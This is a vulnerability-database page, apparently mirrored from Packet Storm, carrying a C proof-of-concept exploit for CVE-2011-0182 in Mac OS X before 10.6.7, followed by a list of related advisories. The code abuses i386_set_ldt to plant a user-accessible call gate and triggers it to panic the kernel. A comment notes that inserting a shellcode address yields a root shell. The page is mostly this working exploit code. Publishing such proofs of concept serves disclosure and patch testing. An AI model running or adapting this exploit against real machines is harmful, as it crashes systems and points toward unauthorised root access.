Lucene search
Chanam ParkPACKETSTORM:105364HistorySep 28, 2011 - 12:00 a.m.
Mac OS X Kernel Panic
2011-09-2800:00:00
Chanam Park
packetstormsecurity.com
19
0.0004 Low
EPSS
Percentile
0.4%
`/*
Mac OS X < 10.6.7 Kernel Panic Exploit
CVE-2011-0182, Proof Of Concept Code
Author - Chanam Park (hkpco)
Date - 2011. 06
Contact - [email protected] , http://hkpco.kr , @hkpco
Thanks for inspiration / x82, riaf.
*/
// Compile: gcc -o CVE-2011-0182_PoC CVE-2011-0182_PoC.c -m32
#include <architecture/i386/table.h>
#include <i386/user_ldt.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void dummy_func( void ) { asm volatile( ".byte 0xff" ); }
int main( void )
{
int ret;
union ldt_entry cgate, cgate2;
char dummy[128] = {0x00,};
cgate.call_gate.offset00 = (unsigned int)dummy_func & 0xffff;
cgate.call_gate.offset16 = ((unsigned int)dummy_func >> 16) & 0xffff;
// You can input shellcode address value here to get the root shell.
/* I got the root shell before. But, It was tested on Hackintosh for AMD. :-p
The normal system has a little different environment.
I have no time for this anymore because of my summer break is over.
So.. Good Luck! */
cgate.call_gate.argcnt = 0;
cgate.call_gate.type = 0xc; // DESC_CALL_GATE
cgate.call_gate.dpl = 3;
cgate.call_gate.present = 1;
cgate.call_gate.seg.rpl = 0;
cgate.call_gate.seg.ti = 0;
cgate.call_gate.seg.index = 16;
cgate2.call_gate.offset00 = 0x0;
cgate2.call_gate.seg.rpl = 0;
cgate2.call_gate.seg.ti = 0;
cgate2.call_gate.seg.index = 0;
cgate2.call_gate.argcnt = 0;
cgate2.call_gate.type = 0;
cgate2.call_gate.dpl = 0;
cgate2.call_gate.present = 1;
cgate2.call_gate.offset16 = 0x0;
printf( "// coded by Chanam Park (hkpco)\n\n" );
ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate, 1 );
printf( "Selector Number in LDT <1>: 0x%x\n", ret );
ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate2, 1 );
printf( "Selector Number in LDT <2>: 0x%x\n\n", ret );
printf( "If you run this program, it can possibly cause \"Kernel Panic\".\n" );
printf( "The program will be continued when you input any value.\n" );
printf( "-> " );
fflush(stdout);
scanf( "%s", dummy );
asm volatile( "lcall $0x3f, $0x0" );
// Trigger
return 0;
}
`
Related
canvas
canvas
Immunity Canvas: CVE_2011_0182
2011-03-23 02:00:00
seebug
seebug
Mac OS X < 10.6.7 Kernel Panic Exploit
2014-07-01 00:00:00
Apple Mac OS X "i386_set_ldt()"权限提升漏洞
2011-03-31 00:00:00
Mac OS X < 10.6.7 Kernel Panic Exploit
2011-09-29 00:00:00
openvas
openvas
Apple Mac OS X 'i386_set_ldt()' Privilege Escalation Vulnerability
2011-10-20 00:00:00
Apple Mac OS X 'i386_set_ldt()' Privilege Escalation Vulnerability
2011-10-20 00:00:00
Mac OS X v10.6.6 Multiple Vulnerabilities (2011-001)
2011-08-26 00:00:00
cvelist
cvelist
CVE-2011-0182
2011-03-23 01:00:00
nvd
nvd
CVE-2011-0182
2011-03-23 02:00:05
exploitpack
exploitpack
Apple Mac OSX 10.6.7 - Kernel Panic (Denial of Service)
2011-09-28 00:00:00
cve
cve
CVE-2011-0182
2011-03-23 02:00:05
prion
prion
Design/Logic Flaw
2011-03-23 02:00:00
exploitdb
exploitdb
Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service)
2011-09-28 00:00:00
securityvulns
securityvulns
About the security content of Mac OS X v10.6.7 and Security Update 2011-001
2011-03-23 00:00:00
Apple Mac OS X multiple security vulnerabilities
2011-03-23 00:00:00
nessus
nessus
Mac OS X 10.6.x < 10.6.7 Multiple Vulnerabilities
2011-03-22 00:00:00